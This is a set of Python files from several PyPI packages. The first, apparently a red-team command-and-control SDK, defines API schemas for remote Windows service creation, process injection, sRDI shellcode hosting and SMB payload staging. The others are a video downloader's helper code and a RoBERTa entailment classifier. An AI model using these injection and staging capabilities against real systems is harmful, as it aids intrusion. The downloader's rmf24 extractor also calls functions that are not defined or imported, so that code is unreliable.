    type: ScriptType = Field(..., description="Script type")
    cached: datetime = Field(..., description="Script cache time", title="Cached")


class ScriptOutput(Schema):
    """One line of script stdio output with its stream type."""

    type: StdioType = Field(..., description="Stdio type", example="out")
    message: str = Field(..., description="Message text", example="[+] Done.", title="Message")


class ServerScriptInfo(Schema):
    """State of a server-side script: status, saved environment, and accumulated output."""

    name: str = Field(..., description="Script name", title="Name")
    status: ServerScriptStatus = Field(..., description="Server script status")
    env: Optional[Dict[str, str]] = Field({}, description="Saved ENV variables", title="Env")
    output: Optional[List[ScriptOutput]] = Field(
        [],
        description="Script output entries",
        example=[{"type": "out", "message": "[+] Done."}],
        title="Output",
    )
class ServiceConfigInCreate(Schema):
    """Windows service configuration supplied when creating a service."""

    display_name: str = Field(..., alias="displayName", example="My Service", title="Displayname")
    binary_path: str = Field(..., alias="binaryPath", example="C:\\Windows\\service.exe", title="Binarypath")
    start_name: Optional[str] = Field(
        "NT AUTHORITY\\SYSTEM",
        alias="startName",
        example="NT AUTHORITY\\SYSTEM",
        title="Startname",
    )
    service_type: Optional[ServiceType] = Field("win32_own_process", alias="serviceType", example="win32_own_process")
    start_type: Optional[ServiceStartType] = Field("demand_start", alias="startType", example="demand_start")
    error_control: Optional[ServiceErrorControl] = Field("error_ignore", alias="errorControl", example="error_ignore")
    name: str = Field(..., example="mysvc", title="Name")


class ServiceConfigInResponse(Schema):
    """Full Windows service configuration as returned by a query, including runtime state."""

    display_name: str = Field(..., alias="displayName", example="My Service", title="Displayname")
    binary_path: str = Field(..., alias="binaryPath", example="C:\\Windows\\service.exe", title="Binarypath")
    start_name: Optional[str] = Field(
        "NT AUTHORITY\\SYSTEM",
        alias="startName",
        example="NT AUTHORITY\\SYSTEM",
        title="Startname",
    )
    service_type: Optional[ServiceType] = Field("win32_own_process", alias="serviceType", example="win32_own_process")
    start_type: Optional[ServiceStartType] = Field("demand_start", alias="startType", example="demand_start")
    error_control: Optional[ServiceErrorControl] = Field("error_ignore", alias="errorControl", example="error_ignore")
    description: str = Field(..., example="Do secret things", title="Description")
    load_order_group: str = Field(..., alias="loadOrderGroup", example="", title="Loadordergroup")
    dependencies: List[str] = Field(..., example=["spoolsv"], title="Dependencies")
    required_privileges: List[SePrivilege] = Field(..., alias="requiredPrivileges", example=["SeDebugPrivilege"])
    process_id: Optional[int] = Field(0, alias="processId", example=1234, title="Processid")
    exit_code: Optional[int] = Field(0, alias="exitCode", example=0, title="Exitcode")
    current_state: Optional[ServiceState] = Field("stopped", alias="currentState", example="running")
class ServiceCreateExArguments(Schema):
    """Arguments for the extended service create: target machine plus a full service config."""

    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    config: ServiceConfigInCreate = Field(
        ...,
        description="Service configuration",
        example={
            "displayName": "My Service",
            "binaryPath": "C:\\Windows\\service.exe",
            "startName": "NT AUTHORITY\\SYSTEM",
            "serviceType": "win32_own_process",
            "startType": "demand_start",
            "errorControl": "error_ignore",
            "name": "mysvc",
        },
        title="Config",
    )


class ServiceCreateExResults(Schema):
    """Task results for the extended service create; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ServiceCreateResults(Schema):
    """Task results for a service create; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ServiceDeleteResults(Schema):
    """Task results for a service delete; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class ServiceModifyArguments(Schema):
    """Arguments for modifying an existing service's configuration."""

    machine: Optional[str] = Field(
        "",
        description="Remote hostname or IP address (otherwise local)",
        example="ADAM-PC",
        title="Machine",
    )
    service: str = Field(..., description="Service name", example="spoolsv", title="Service")
    config: Optional[ServiceConfigInResponse] = Field(
        None,
        description="Service configuration",
        example={
            "displayName": "My Service",
            "binaryPath": "C:\\Windows\\service.exe",
            "startName": "NT AUTHORITY\\SYSTEM",
            "serviceType": "win32_own_process",
            "startType": "demand_start",
            "errorControl": "error_ignore",
            "description": "Do secret things",
            "loadOrderGroup": "",
            "dependencies": [],
            "requiredPrivileges": ["SeDebugPrivilege"],
            "processId": 0,
            "exitCode": 0,
            "currentState": "stopped",
        },
        title="Config",
    )


class ServiceModifyResults(Schema):
    """Task results for a service modify; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class ServiceQueryResults(Schema):
    """Task results for a service query; `config` holds the full service configuration."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    config: Optional[ServiceConfigInResponse] = Field(
        None,
        description="Full service configuration",
        example={
            "displayName": "My Service",
            "binaryPath": "C:\\Windows\\service.exe",
            "startName": "NT AUTHORITY\\SYSTEM",
            "serviceType": "win32_own_process",
            "startType": "demand_start",
            "errorControl": "error_ignore",
            "description": "Do secret things",
            "loadOrderGroup": "",
            "dependencies": ["spoolsv"],
            "requiredPrivileges": ["SeDebugPrivilege"],
            "processId": 1234,
            "exitCode": 0,
            "currentState": "running",
        },
        title="Config",
    )


class ServiceStartResults(Schema):
    """Task results for a service start; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ServiceStopResults(Schema):
    """Task results for a service stop; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ShareAddResults(Schema):
    """Task results for adding a network share; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )


class ShareDeleteResults(Schema):
    """Task results for deleting a network share; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class ShareInfo(Schema):
    """One network-share entry: remote path, optional local mapping, and resource typing."""

    remote: str = Field(
        ...,
        description="Remote resource path",
        example="\\\\REMOTE\\Data",
        title="Remote",
    )
    local: Optional[str] = Field(
        None,
        description="Local resource path (drive letter)",
        example="D:",
        title="Local",
    )
    scope: ShareScope = Field(..., description="Resource scope", example="connected")
    rtype: ShareType = Field(..., description="Resource type", example="disk")
    dtype: ShareDisplayType = Field(..., description="Resource display type", example="share")


class ShareListResults(Schema):
    """Task results for a share listing: shares visible in the current session."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    shares: Optional[List[ShareInfo]] = Field(
        [],
        description="Network shares in the current session",
        example=[
            {
                "remote": "\\\\REMOTE\\C$",
                "scope": "connected",
                "rtype": "disk",
                "dtype": "share",
            },
            {
                "remote": "\\\\SERVER\\Data",
                "local": "D:",
                "scope": "remembered",
                "rtype": "disk",
                "dtype": "share",
            },
        ],
        title="Shares",
    )


class SmbStageResults(Schema):
    """Task results for SMB staging; carries only the shared error field."""

    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
class TaskDetails(Schema):
    """Full record of one task: identity, ownership, timing, delivery/status, and its
    arguments/results payloads. Extra fields are allowed to pass through."""

    id: UUID = Field(..., title="Id")
    tool: Tool
    command: str = Field(..., title="Command")
    instance_id: Optional[UUID] = Field(None, alias="instanceId", title="Instanceid")
    instance_tag: Optional[str] = Field(None, alias="instanceTag", title="Instancetag")
    instance_name: Optional[str] = Field(None, alias="instanceName", title="Instancename")
    owner_id: Optional[UUID] = Field(None, alias="ownerId", title="Ownerid")
    owner: Optional[str] = Field(None, title="Owner")
    created_at: datetime = Field(..., alias="createdAt", title="Createdat")
    updated_at: datetime = Field(..., alias="updatedAt", title="Updatedat")
    delivery: TaskDelivery
    status: TaskStatus
    context: TaskContext
    arguments: TaskArguments
    results: TaskResults

    class Config:
        # Accept and preserve unknown fields rather than rejecting them.
        extra = "allow"


class TasksWithCursor(Schema):
    """A page of tasks plus the cursor for fetching the next page."""

    next_cursor: Optional[int] = Field(None, alias="nextCursor", title="Nextcursor")
    tasks: List[TaskDetails] = Field(..., title="Tasks")
class UserInCreate(Schema):
username: str = Field(..., max_length=25, title="Username")
password: str = Field(..., max_length=100, title="Password")
role: UserRole
is_active: Optional[bool] = Field(True, alias="isActive", title="Isactive")
class UserInResponse(Schema):
id: UUID = Field(..., title="Id")
username: str = Field(..., max_length=25, title="Username")
role: UserRole
is_active: bool = Field(..., alias="isActive", title="Isactive")
class UserInUpdate(Schema):
    """Partial-update request body for a user; every field is optional."""
    username: Optional[str] = Field(None, max_length=25, title="Username")
    password: Optional[str] = Field(None, max_length=100, title="Password")
    role: Optional[UserRole] = None
    is_active: Optional[bool] = Field(None, alias="isActive", title="Isactive")
class BlobReferenceOrPayloadOrData(Schema):
    """Binary input expressed one of three ways: a stored blob id, raw bytes, or a payload seed."""
    id: Optional[str] = Field(None, description="Blob identifier", title="Id")
    name: Optional[str] = Field(None, description="Contextual name", title="Name")
    data: Optional[bytes] = Field(None, description="Raw data", title="Data")
    payload: Optional[PayloadSeed] = Field(None, description="Payload seed", title="Payload")
class ClientScriptResults(Schema):
    """Results payload for a client-side script tasking: error info plus script output lines."""
    error_info: Optional[TaskErrorInfo] = Field(
        None,
        alias="errorInfo",
        description="Additional error information if the tasking has failed",
        title="Errorinfo",
    )
    output: Optional[List[ScriptOutput]] = Field(
        [],
        description="Script output entries",
        example=[{"type": "out", "message": "[+] Done."}],
        title="Output",
    )
class FileUploadArguments(Schema):
    """Arguments for writing a file to the remote host."""
    data: BlobReferenceOrPayloadOrData = Field(
        ..., description="File data to write", example="EXAMPLE_BLOB", title="Data"
    )
    path: str = Field(
        ...,
        description="Remote file path (supports environment variables)",
        example="C:\\Windows\\upload.ext",
        title="Path",
    )
    force: Optional[bool] = Field(
        False,
        description="Overwrite the target file if needed",
        example=False,
        title="Force",
    )
class HostShellcodeArguments(Schema):
    """Arguments for converting a payload to shellcode (sRDI) and hosting it on a web endpoint."""
    srdi_exported_function: Optional[str] = Field(
        "none",
        alias="srdiExportedFunction",
        description="Exported function to execute post load [sRDI]",
        example="MyExport",
        title="Srdiexportedfunction",
    )
    srdi_user_data: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        alias="srdiUserData",
        description="User data to pass to exported function [sRDI]",
        example="user_data",
        title="Srdiuserdata",
    )
    srdi_flags: Optional[int] = Field(
        0,
        alias="srdiFlags",
        description="Configuration flags for loading process [sRDI]",
        title="Srdiflags",
    )
    encoding: Optional[HostingEncoding] = Field("base64", description="Encoding for binary data", example="base64")
    base_url: Optional[str] = Field(
        "",
        alias="baseUrl",
        description="Base URL (default is from profile)",
        example="http://mycustom.com",
        title="Baseurl",
    )
    endpoint: str = Field(
        ...,
        description="Web endpoint path to host data",
        example="/custom",
        title="Endpoint",
    )
    payload: BlobReferenceOrPayloadOrData = Field(
        ...,
        description="Payload or blob to convert to shellcode and host",
        title="Payload",
    )
class InjectArguments(Schema):
    """Arguments for injecting a payload into a (possibly remote) process."""
    srdi_exported_function: Optional[str] = Field(
        "none",
        alias="srdiExportedFunction",
        description="Exported function to execute post load [sRDI]",
        example="MyExport",
        title="Srdiexportedfunction",
    )
    srdi_user_data: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        alias="srdiUserData",
        description="User data to pass to exported function [sRDI]",
        example="user_data",
        title="Srdiuserdata",
    )
    srdi_flags: Optional[int] = Field(
        0,
        alias="srdiFlags",
        description="Configuration flags for loading process [sRDI]",
        title="Srdiflags",
    )
    process: Optional[str] = Field(
        "",
        description="Process name/pid to inject into (otherwise local)",
        example="explorer.exe",
        title="Process",
    )
    payload: BlobReferenceOrPayloadOrData = Field(
        ...,
        description="Payload data to inject",
        example="EXAMPLE_PAYLOAD",
        title="Payload",
    )
    technique: Optional[InjectionTechnique] = Field(
        "standard", description="Injection technique/procedure", example="standard"
    )
    skip_conversion: Optional[bool] = Field(
        False,
        alias="skipConversion",
        description="Skip sRDI conversion (payload is already shellcode)",
        example=False,
        title="Skipconversion",
    )
class SmbStageArguments(Schema):
    """Arguments for staging a payload to a host over SMB (named pipe delivery)."""
    srdi_exported_function: Optional[str] = Field(
        "none",
        alias="srdiExportedFunction",
        description="Exported function to execute post load [sRDI]",
        example="MyExport",
        title="Srdiexportedfunction",
    )
    srdi_user_data: Optional[BlobReferenceOrData] = Field(
        {"id": "null", "size": 0},
        alias="srdiUserData",
        description="User data to pass to exported function [sRDI]",
        example="user_data",
        title="Srdiuserdata",
    )
    srdi_flags: Optional[int] = Field(
        0,
        alias="srdiFlags",
        description="Configuration flags for loading process [sRDI]",
        title="Srdiflags",
    )
    host: str = Field(..., description="Hostname or IP address", example="ADAM-PC", title="Host")
    payload: BlobReferenceOrPayloadOrData = Field(
        ..., description="Payload to stage", example="EXAMPLE_PAYLOAD", title="Payload"
    )
    migrate: Optional[str] = Field(
        "local",
        description="Migrate to this process during stage (otherwise `local`)",
        title="Migrate",
    )
    pipe: Optional[str] = Field(
        "",
        description="Named pipe for stage delivery (default = profile['stagers']['native']['pipe'])",
        title="Pipe",
    )
    convert: Optional[bool] = Field(False, description="Convert to shellcode before delivery", title="Convert")
    timeout: Optional[int] = Field(
        0,
        description="Named pipe timeout in seconds (default = profile['smb']['timeout'])",
        title="Timeout",
    )
class TransformPeCloneExports(Schema):
    """Arguments for cloning the export table of a reference PE onto a target PE."""
    target: BlobReferenceOrPayloadOrData = Field(
        ...,
        description="Target PE file data",
        example="EXAMPLE_PAYLOAD",
        title="Target",
    )
    reference: BlobReferenceOrData = Field(
        ...,
        description="Reference PE file data",
        example="EXAMPLE_BLOB",
        title="Reference",
    )
    reference_path: str = Field(
        ...,
        alias="referencePath",
        description="Reference file path on disk during load",
        example="C:\\Windows\\System32\\wkscli.dll",
        title="Referencepath",
    )
class TransformPeConvertToShellcode(Schema):
srdi_exported_function: Optional[str] = Field(
"none",
alias="srdiExportedFunction",
description="Exported function to execute post load [sRDI]",
example="MyExport",
title="Srdiexportedfunction",
)
srdi_user_data: Optional[BlobReferenceOrData] = Field(
{"id": "null", "size": 0},
alias="srdiUserData",
description="User data to pass to exported function [sRDI]",
example="user_data",
title="Srdiuserdata",
)
srdi_flags: Optional[int] = Field(
0,
alias="srdiFlags",
description="Configuration flags for loading process [sRDI]",
title="Srdiflags",
)
target: BlobReferenceOrPayloadOrData = Field(
...,
description="PE file data to convert",
example="EXAMPLE_PAYLOAD",
title="Target",
) | /rtt_sdk-0.2.0-py3-none-any.whl/rtt_sdk/models.py | 0.918663 | 0.17259 | models.py | pypi |
import contextlib
import os
import re
import sys
import urllib.parse
import tldextract
import validators
from rtv.exceptions import WrongUrlError
class DevNull:
    """A write-only, file-like sink: ``write`` and ``flush`` discard everything."""

    def write(self, *_args, **_kwargs):
        # Accept whatever the stdout machinery passes in and ignore it.
        return None

    def flush(self):
        # Nothing buffered, nothing to do.
        return None
@contextlib.contextmanager
def suppress_stdout():
    """
    Context manager that suppresses stdout.

    stdout is restored in a ``finally`` block, so an exception raised
    inside the ``with`` body can no longer leave the process with a
    silenced ``sys.stdout`` (the original implementation skipped the
    restore on error).

    Examples:
        >>> with suppress_stdout():
        ...     print('Test print')
        >>> print('test')
        test
    """
    save_stdout = sys.stdout
    sys.stdout = DevNull()
    try:
        yield
    finally:
        sys.stdout = save_stdout
def validate_url(url):
    """
    Validate url using the ``validators`` package.

    Note: on failure ``validators.url`` returns a *falsy* ``ValidationFailure``
    object rather than ``False`` (see the second example), so callers must use
    truthiness tests (``if not validate_url(...)``), never ``is False``.

    Args:
        url (str): Url.

    Returns:
        bool: True if valid, falsy ValidationFailure otherwise.

    Examples:
        >>> validate_url('http://google.com')
        True
        >>> validate_url('http://google') # doctest: +ELLIPSIS
        ValidationFailure(...)
        >>> if not validate_url('http://google'):
        ...     print('not valid')
        not valid
    """
    return validators.url(url)
def get_domain_name(url):
    """
    Extract the registered domain name from *url*, dropping any subdomain.

    Args:
        url (str): Url.

    Returns:
        str: Domain name (``domain.suffix``).

    Raises:
        WrongUrlError: If the url does not validate.

    Examples:
        >>> get_domain_name('https://vod.tvp.pl/video/')
        'tvp.pl'
        >>> get_domain_name('https://vod')
        Traceback (most recent call last):
        ...
        rtv.exceptions.WrongUrlError: Couldn't match domain name of this url: https://vod
    """
    if not validate_url(url):
        raise WrongUrlError(f"Couldn't match domain name of this url: {url}")
    parts = tldextract.extract(url)
    return '.'.join((parts.domain, parts.suffix))
def clean_video_data(_data):
    """
    Return a cleaned copy of the video data dict.

    Currently only the title is cleaned (via :func:`clean_title`);
    the input dict is never mutated.

    Args:
        _data (dict): Information about the video.

    Returns:
        dict: Refined video data.
    """
    data = dict(_data)
    title = data.get('title')
    if title:
        data['title'] = clean_title(title)
    return data
def clean_title(title):
    """
    Normalise a title: remove embedded dates, collapse runs of whitespace
    and strip leading/trailing spaces.

    Args:
        title (str): Title.

    Returns:
        str: Cleaned title.
    """
    # Dates such as 12.05.2018 or 1/2/18 (2- or 4-digit year), together
    # with the non-word characters around them.
    date_pattern = re.compile(r'\W*\d{1,2}[/\-.]\d{1,2}[/\-.](?=\d*)(?:.{4}|.{2})\W*')
    without_dates = date_pattern.sub(' ', title)
    collapsed = re.sub(r'\s{2,}', ' ', without_dates)
    return collapsed.strip()
def clean_filename(filename):
    """
    Remove unsupported filename characters.

    On Windows file names cannot contain any of \\/:*?"<>| characters.
    Effectively keeps only alphanumerics, ``-_#.,()`` and spaces.

    Args:
        filename (str): Name of a file.

    Returns:
        str: Filename without unsupported characters.
    """
    # Raw string: the original non-raw pattern relied on the invalid escape
    # sequences '\w' and '\-', which emit DeprecationWarnings on modern Python.
    return re.sub(r'[^\w\-_#.,() ]', '', filename)
def file_exists(path):
    """
    Check whether a file exists.

    Thin wrapper over :func:`os.path.exists` (so, like it, this also
    returns True for directories and False for broken symlinks).

    Args:
        path (str): Path to a file.

    Returns:
        bool: True if exists, False otherwise.
    """
    return os.path.exists(path)
def get_ext(url):
    """
    Return the filename extension (without the dot) from a url's path,
    ignoring query strings and fragments.

    Args:
        url (str): String representation of a url.

    Returns:
        str: Extension, or '' when the path has none.
    """
    path = urllib.parse.urlparse(url).path
    extension = os.path.splitext(path)[1]
    return extension.lstrip('.')
def delete_duplicates(seq):
"""
Remove duplicates from an iterable, preserving the order.
Args:
seq: Iterable of various type.
Returns:
list: List of unique objects.
"""
seen = set()
seen_add = seen.add
return [x for x in seq if not (x in seen or seen_add(x))] | /rtv-downloader-2.0.8.tar.gz/rtv-downloader-2.0.8/rtv/utils.py | 0.567098 | 0.254532 | utils.py | pypi |
import re
from typing import Any, ClassVar, Dict, List, Match, Optional
import requests
import youtube_dl
from bs4 import BeautifulSoup
from rtv.utils import get_domain_name, suppress_stdout
from rtv.video import Video
# Type aliases for extractor results: one Entry dict per extracted video.
Entry = Dict[str, Any]
Entries = List[Entry]
class Extractor:
    """
    Base class for site-specific video extractors.

    Subclasses define ``SITE_NAME`` and ``_VALID_URL`` and implement
    :meth:`extract`, which must return a list of entry dicts.
    """
    SITE_NAME: ClassVar[str]
    _VALID_URL: ClassVar[str]

    url: str
    html: str
    videos: List[Video]
    response: requests.models.Response

    def __init__(self, url: str) -> None:
        self.url = url
        self.videos = []

    @classmethod
    def validate_url(cls, url: str) -> Optional[Match[str]]:
        """Check if the Extractor can handle the given url."""
        match = re.match(cls._VALID_URL, url)
        return match

    def load_html(self) -> None:
        """Download ``self.url`` and store the response and its UTF-8 text."""
        r = requests.get(self.url)
        r.encoding = 'utf-8'
        self.response = r
        self.html = r.text

    def get_info(self) -> dict:
        """Get information about the videos from YoutubeDL package."""
        with suppress_stdout():
            with youtube_dl.YoutubeDL() as ydl:
                info_dict = ydl.extract_info(self.url, download=False)
        return info_dict

    @staticmethod
    def update_entries(entries: Entries, data: dict) -> None:
        """Update each entry in the list with some data (mutates in place)."""
        for entry in entries:
            entry.update(data)

    def extract(self) -> Entries:
        """Extract data from the url. Redefine in subclasses."""
        raise NotImplementedError('This method must be implemented by subclasses')

    def run(self) -> None:
        """Run :meth:`extract` and wrap each resulting entry in a Video."""
        entries = self.extract()
        # Validate the subclass's return value *before* touching it; the
        # original only checked after update_entries() had already iterated
        # over a possibly wrong type.
        if not isinstance(entries, list):
            raise TypeError('extract method must return an iterable of dictionaries')
        self.update_entries(entries, {
            'site': get_domain_name(self.url)
        })
        for entry in entries:
            video = Video(entry)
            self.videos.append(video)
class GenericTitleMixin:
    """Mixin that reads the page title from the ``og:title`` meta tag."""
    soup: BeautifulSoup

    def get_title(self) -> Optional[str]:
        tag = self.soup.select_one('meta[property="og:title"]')
        return tag.get('content') if tag else None
class GenericDescriptionMixin:
soup: BeautifulSoup
def get_description(self) -> Optional[str]:
meta_tag = self.soup.select_one('meta[property="og:description"]')
if meta_tag:
description = meta_tag.get('content')
return description
return None | /rtv-downloader-2.0.8.tar.gz/rtv-downloader-2.0.8/rtv/extractors/common.py | 0.642545 | 0.16944 | common.py | pypi |
import re
from datetime import datetime
from typing import Optional
from bs4 import BeautifulSoup
from rtv.extractors.common import (
Extractor, GenericDescriptionMixin, GenericTitleMixin
)
from rtv.utils import get_ext
class Rmf24(GenericTitleMixin, GenericDescriptionMixin, Extractor):
SITE_NAME = 'rmf24.pl'
_VALID_URL = r'https?://(?:www\.)?rmf24\.pl/'
def __init__(self, *args, **kwargs):
    """Fetch the page and parse it with BeautifulSoup (lxml parser).

    NOTE(review): performs network I/O in the constructor via
    ``load_html()`` — behaviour inherited from Extractor's design.
    """
    super().__init__(*args, **kwargs)
    self.load_html()
    self.soup = BeautifulSoup(self.html, 'lxml')

# TODO: use decorators to mark the need to use bs4?
# TODO: make_soup(html=Optional) or/and load_html(url=Optional)
def get_date(self) -> Optional[datetime]:
    """Return the publication date parsed from the page's ``datePublished``
    meta tag, or None when that tag is missing."""
    tag = self.soup.select_one('meta[itemprop=datePublished]')
    if not tag:
        return None
    published = tag.get('content')
    return datetime.strptime(published, '%Y-%m-%dT%H:%M:%S')
@staticmethod
def extract_entry(scraped_info):
    """
    Transform scraped_info dictionary into an entry, under the assumption that there is only
    one track in 'track' list, since each video/audio is instantiated individually
    on the RMF website and each of them is scraped independently, so there shouldn't be cases
    when there are 2 unrelated tracks in one info_dict.

    Args:
        scraped_info (dict): Video info dict, scraped straight from the website.
            Expected to contain 'tracks' (list with one dict holding 'src'
            and 'data') and optionally 'width'/'height'.

    Returns:
        dict: Entry containing title, formats (url, quality), thumbnail, etc.
    """
    quality_mapping = {  # ascending in terms of quality
        'lo': 0,
        'hi': 1
    }
    entry = scraped_info['tracks'][0]
    '''
    The structure of entry is as follows:
    'src': {
        'hi': [
            {
                'src': 'http://v.iplsc.com/30-11-gosc-marek-jakubiak/0007124B3CGCAE6P-A1.mp4',
                'type': 'video/mp4'
            }
        ],
        'lo': [
            {
                'src': 'http://v.iplsc.com/30-11-gosc-marek-jakubiak/0007124B3CGCAE6P-A1.mp4',
                'type': 'video/mp4'
            }
        ]
    }
    '''
    sources = entry.pop('src')
    # TODO: #LOW_PRIOR Remove date from title of audio files e.g. '10.06 Gość: Jarosław Gowin'
    formats = []
    # Build one format dict per quality bucket ('lo'/'hi').
    for src_name, src in sources.items():
        url = src[0]['src']
        formats.append({
            'url': url,
            'quality': quality_mapping[src_name],
            'ext': get_ext(url),
            'width': int(scraped_info.get('width', 0)),
            'height': int(scraped_info.get('height', 0)),
        })
    # outer level url and ext come from the video of the lowest quality
    # you can access rest of the urls under 'formats' key
    worst_format = min(formats, key=lambda f: f['quality'])
    entry.update({
        **entry.pop('data'),
        'formats': formats,
        'url': worst_format['url'],
        'ext': worst_format['ext']
    })
    return entry
def _scrape_entries(self):
    """Scrape ``Video.createInstance({...})`` JS objects embedded in the page.

    NOTE(review): this method relies on ``js2py``, which is NOT imported in
    this module — calling it raises NameError as written. It also appears
    unused (``extract`` does not call it); confirm whether the import was
    lost or the method is dead code.
    """
    entries = []
    pattern = re.compile(r'Video.createInstance\((?P<js_object>{.*?})\);', re.DOTALL)
    scripts = self.soup.findAll('script', text=pattern)
    for script in scripts:
        matches = pattern.findall(script.text)
        for data in matches:  # matches is a list of matched strings, not match objects
            info_dict = js2py.eval_js(f'Object({data})').to_dict()
            entries.append(self.extract_entry(info_dict))
    # temporarily return only audio entries if present, otherwise return all video entries
    audio_entries = [e for e in entries if e.get('type', 'video') == 'audio']
    if audio_entries:
        entries = audio_entries
    return entries
def extract(self):
audio_url = self._get_audio_source_url()
extension = get_ext(audio_url)
entries = [{
'title': self.get_title(),
'description': self.get_description(),
'date': self.get_date(),
'url': audio_url,
'ext': extension
}]
return entries | /rtv-downloader-2.0.8.tar.gz/rtv-downloader-2.0.8/rtv/extractors/rmf24.py | 0.50952 | 0.165222 | rmf24.py | pypi |
from transformers import RobertaTokenizer, RobertaForSequenceClassification
from .basic_model import BasicModel
from torch.utils.data import Dataset, DataLoader
from .set_dataset import get_data
import torch
import tqdm
__all__ = ["RobertaModel"]
class DatasetTERRa(Dataset):
    """torch Dataset over a TERRa dataframe: encodes each row as
    ``[CLS] premise [SEP] hypothesis [SEP]`` token ids, zero-padded or
    truncated to ``max_len``."""

    def __init__(self, dataframe, tokenizer, max_len):
        self.len = len(dataframe)
        self.data = dataframe
        self.tokenizer = tokenizer
        self.max_len = max_len

    def __getitem__(self, index):
        """Return input_ids, attention_mask and label tensors for row *index*."""
        premise = self.data.iloc[index]['premise']
        hypothesis = self.data.iloc[index]['hypothesis']
        label = self.data.iloc[index]['label']
        # Pre-allocated zero buffers double as padding.
        pair_token_ids_padded = torch.zeros(self.max_len, dtype=torch.long)
        attention_mask_ids_padded = torch.zeros(self.max_len, dtype=torch.long)
        premise_id = self.tokenizer.encode(premise, add_special_tokens=False)
        hypothesis_id = self.tokenizer.encode(hypothesis, add_special_tokens=False)
        pair_token_ids = [self.tokenizer.cls_token_id] + premise_id + [self.tokenizer.sep_token_id] + hypothesis_id + [
            self.tokenizer.sep_token_id]
        if len(pair_token_ids) < self.max_len:
            pair_token_ids_padded[:len(pair_token_ids)] = torch.tensor(pair_token_ids)
        else:
            # NOTE(review): hard truncation can drop the final [SEP] — confirm intended.
            pair_token_ids_padded = torch.tensor(pair_token_ids[:self.max_len])
        premise_len = len(premise_id)
        hypothesis_len = len(hypothesis_id)
        # +3 accounts for the [CLS] and two [SEP] special tokens added above.
        attention_mask_ids = torch.tensor([1] * (premise_len + hypothesis_len + 3))
        if len(attention_mask_ids) < self.max_len:
            attention_mask_ids_padded[:len(attention_mask_ids)] = attention_mask_ids
        else:
            attention_mask_ids_padded = attention_mask_ids[:self.max_len]
        return {
            'input_ids': pair_token_ids_padded,
            'attention_mask': attention_mask_ids_padded,
            'labels': torch.tensor(label, dtype=torch.long)
        }

    def __len__(self):
        return self.len
class RobertaModel(BasicModel):
def __init__(self, model_dir):
    """Load a RoBERTa sequence classifier and tokenizer from *model_dir*,
    move the model to ``self.device`` (set by BasicModel) and put it in
    eval mode."""
    super().__init__()
    self.model = RobertaForSequenceClassification.from_pretrained(model_dir)
    self.model.to(self.device).eval()
    self.tokenizer = RobertaTokenizer.from_pretrained(model_dir)
    # Fixed encoding length; prepare_data pads/truncates to this.
    self.max_len = 512
def prepare_data(self, premise, hypothesis):
    """Encode a single (premise, hypothesis) pair as padded input_ids and
    attention_mask tensors of length ``self.max_len``.

    NOTE(review): this duplicates DatasetTERRa.__getitem__'s encoding
    logic (minus the label) — keep the two in sync.
    """
    pair_token_ids_padded = torch.zeros(self.max_len, dtype=torch.long)
    attention_mask_ids_padded = torch.zeros(self.max_len, dtype=torch.long)
    premise_id = self.tokenizer.encode(premise, add_special_tokens=False)
    hypothesis_id = self.tokenizer.encode(hypothesis, add_special_tokens=False)
    pair_token_ids = [self.tokenizer.cls_token_id] + premise_id + [self.tokenizer.sep_token_id] + hypothesis_id + [
        self.tokenizer.sep_token_id]
    if len(pair_token_ids) < self.max_len:
        pair_token_ids_padded[:len(pair_token_ids)] = torch.tensor(pair_token_ids)
    else:
        # NOTE(review): hard truncation can drop the final [SEP] — confirm intended.
        pair_token_ids_padded = torch.tensor(pair_token_ids[:self.max_len])
    premise_len = len(premise_id)
    hypothesis_len = len(hypothesis_id)
    # +3 accounts for the [CLS] and two [SEP] special tokens added above.
    attention_mask_ids = torch.tensor([1] * (premise_len + hypothesis_len + 3))
    if len(attention_mask_ids) < self.max_len:
        attention_mask_ids_padded[:len(attention_mask_ids)] = attention_mask_ids
    else:
        attention_mask_ids_padded = attention_mask_ids[:self.max_len]
    return {"input_ids": pair_token_ids_padded, "attention_mask": attention_mask_ids_padded}
def predict(self, inputs):
    """Return the predicted class index (int) for one prepared input pair."""
    ids = inputs["input_ids"].reshape((1, -1)).to(self.device)
    mask = inputs["attention_mask"].reshape((1, -1)).to(self.device)
    with torch.no_grad():
        logits = self.model(input_ids=ids, attention_mask=mask).logits
        best = torch.argmax(logits, dim=1)
    return int(best[0])
def validate(self, filename):
data = get_data(filename)
dataset = DatasetTERRa(data, self.tokenizer, self.max_len)
loader = DataLoader(dataset, batch_size=16)
targets = data["label"].tolist()
preds = []
with torch.no_grad():
for batch in tqdm.tqdm(loader):
x = self.model(
